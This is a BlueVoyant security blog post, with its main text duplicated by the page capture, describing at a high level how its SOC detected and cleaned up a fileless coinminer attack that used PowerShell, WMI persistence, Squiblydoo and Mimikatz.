Home Blog Detecting and Mitigating Multi-faceted Fileless Attacks Detecting and Mitigating Multi-faceted Fileless Attacks BlueVoyant Share: Facebook Twitter LinkedIn “Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities. Security experts estimate that around 35% of all attacks are now fileless. Our experience at the BlueVoyant SOC validates this. Fileless attacks present a unique challenge to a SOC because they avoid detection from antivirus. They don’t install malware to infect endpoints. They exist in memory. And they use common system tools and approved applications to carry out an attack. As a result, the SOC must rely on behavioral detection tools which require interpretation by skilled security analysts to detect, respond and mitigate. The BlueVoyant SOC recently defended against a sophisticated and multi-faceted fileless attack. The ultimate goal was installing a coinminer, but with a lot more malicious activity occurring. The attack utilized living-off-the-land techniques using native Windows tools to avoid detection. It initiated with PowerShell scripts and Netsh opening ports on our client’s firewall. It then utilized four different WMI mechanisms resulting in an advanced form of persistence on three hosts. The attack used Squiblydoo to download eight pieces of malware. The most dangerous threat was a PowerShell variant of Mimikatz used to scrape credentials and potentially provide free reign across all devices on the network. Mimikatz was loaded directly into memory, bypassing Windows security. It then dropped Mirai and XMRRIG coinminer. Interestingly, the attack looked for and remediated other malware on the device so that it was the only coinminer. The BlueVoyant Threat Fusion Cell team continuously investigates the threat landscape to identify unknown and emerging threats. They provided our SOC with a list of indicators and a detailed write-up on this new fileless attack. When our client was hit by this attack, we were ready. Our SOC analysts immediately removed the artifacts used to create persistence in the infected devices. They updated a specific NextGen AV policy to block Squiblydoo. Our SOC analysts detected and blacklisted the eight pieces of malware. They used EDR (Endpoint Detection and Response) to analyze behaviors, confirm the legitimacy of any PowerShell executions, and investigate process ancestry. This was a very advanced attack with many moving parts, requiring multiple security tools, threat intelligence and an expert SOC analyst team to detect, respond and mitigate. Share: Facebook Twitter LinkedIn Related reading Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more
BlueVoyant Share: Facebook Twitter LinkedIn “Life in the SOC” is a Blog Series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities. Security experts estimate that around 35% of all attacks are now fileless. Our experience at the BlueVoyant SOC validates this. Fileless attacks present a unique challenge to a SOC because they avoid detection from antivirus. They don’t install malware to infect endpoints. They exist in memory. And they use common system tools and approved applications to carry out an attack. As a result, the SOC must rely on behavioral detection tools which require interpretation by skilled security analysts to detect, respond and mitigate. The BlueVoyant SOC recently defended against a sophisticated and multi-faceted fileless attack. The ultimate goal was installing a coinminer, but with a lot more malicious activity occurring. The attack utilized living-off-the-land techniques using native Windows tools to avoid detection. It initiated with PowerShell scripts and Netsh opening ports on our client’s firewall. It then utilized four different WMI mechanisms resulting in an advanced form of persistence on three hosts. The attack used Squiblydoo to download eight pieces of malware. The most dangerous threat was a PowerShell variant of Mimikatz used to scrape credentials and potentially provide free reign across all devices on the network. Mimikatz was loaded directly into memory, bypassing Windows security. It then dropped Mirai and XMRRIG coinminer. Interestingly, the attack looked for and remediated other malware on the device so that it was the only coinminer. The BlueVoyant Threat Fusion Cell team continuously investigates the threat landscape to identify unknown and emerging threats. They provided our SOC with a list of indicators and a detailed write-up on this new fileless attack. When our client was hit by this attack, we were ready. Our SOC analysts immediately removed the artifacts used to create persistence in the infected devices. They updated a specific NextGen AV policy to block Squiblydoo. Our SOC analysts detected and blacklisted the eight pieces of malware. They used EDR (Endpoint Detection and Response) to analyze behaviors, confirm the legitimacy of any PowerShell executions, and investigate process ancestry. This was a very advanced attack with many moving parts, requiring multiple security tools, threat intelligence and an expert SOC analyst team to detect, respond and mitigate. Share: Facebook Twitter LinkedIn Related reading Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more
Ransomware Why Are the Consequences of Ransomware Attacks Rarely Fully Understood? May 24, 2022 According to BlueVoyant’s ransomware research, unsuspecting victims suffer the consequences, such as layoffs, medical treatment delays, travel… Read more
Ransomware From Ransomware to the U.K.’s Cybersecurity Strategy May 20, 2022 In the past couple of years, ransomware attacks have doubled and – in some instances – quadrupled in frequency, as noted in BlueVoyant’s Ransomware… Read more
Microsoft Security BlueVoyant Awarded L4 Cloud Security Rockstar Team from Microsoft Private Security Community May 17, 2022 This week, Caleb Freitas and Mona Ghadiri received the L4 Cloud Security Rockstar Team award on behalf of BlueVoyant. Read more